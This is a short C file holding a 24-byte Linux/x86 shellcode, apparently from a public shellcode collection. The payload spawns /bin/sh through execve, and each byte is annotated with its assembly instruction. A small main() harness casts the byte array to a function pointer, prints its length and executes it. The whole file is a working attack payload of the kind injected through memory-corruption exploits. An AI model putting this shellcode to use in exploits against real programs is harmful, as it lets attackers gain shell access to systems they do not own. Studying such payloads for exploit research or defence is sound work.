/* * [Linux/x86] * Shellcode for: execve("/bin/sh", ["/bin/sh"], NULL) * 24 bytes * hophet [at] gmail.com * http://www.nlabs.com.br/~hophet/ * */ char shellcode[] = "\x99" // cltd "\x31\xc0" // xor %eax,%eax "\x52" // push %edx "\x68\x6e\x2f\x73\x68" // push $0x68732f6e "\x68\x2f\x2f\x62\x69" // push $0x69622f2f "\x89\xe3" // mov %esp,%ebx "\x52" // push %edx "\x53" // push %ebx "\x89\xe1" // mov %esp,%ecx "\xb0\x0b" // mov $0xb,%al "\xcd\x80"; // int $0x80 int main() { void (*p)(); p = (void *)&shellcode; printf("Lenght: %d\n", strlen(shellcode)); p(); }